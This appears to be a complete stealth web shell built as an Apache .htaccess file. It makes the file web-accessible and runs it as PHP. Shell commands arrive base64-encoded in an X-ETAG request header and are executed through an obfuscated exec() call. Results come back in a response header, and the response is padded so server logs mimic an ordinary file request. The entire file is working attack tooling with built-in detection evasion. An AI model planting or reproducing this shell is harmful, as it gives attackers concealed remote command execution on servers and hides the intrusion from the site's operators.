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# Self contained .htaccess stealth web shell - Part of the htshell project
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# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^\.htaccess">
# Uncomment the line below for Apache2.4 and newer
# Require all granted
    Order allow,deny
    Allow from all
</Files>

# Make .htaccess file be interpreted as php file. This occur after apache has interpreted
# the apache directives from the .htaccess file
AddType application/x-httpd-php .htaccess

# Enable output buffering so we can fudge content length in logs (see the ob_* calls)
php_value output_buffering 1

# Rewrite supposed url to the .htaccess file if X-ETAG request header is set
RewriteEngine on
RewriteCond %{HTTP:X-ETAG} !^$
RewriteRule .* .htaccess [L]
RewriteCond %{HTTP:X-ETAG} ^$
RewriteRule .htaccess - [F]

# Set $e to exec(), discard 2 byte padding on base64 encoding (breaks automated decoding),
payload in X-ETAG header
# Then make sure the log contains a 200 ok response with response size of 9326 (should
match the file you are impersonating or a code in a 404 response)
# SHELL <?php ob_clean(); $b= "base64"."_decode"; $e = str_replace('y','e','yxyz');
$e($b(substr($_SERVER['HTTP_X_ETAG'],2)). " 2>&1", $o); header("X-ETAG:
AA".base64_encode(implode("\r\n ", $o))); print str_repeat(" ", 9326); ob_flush(); exit();
?>
```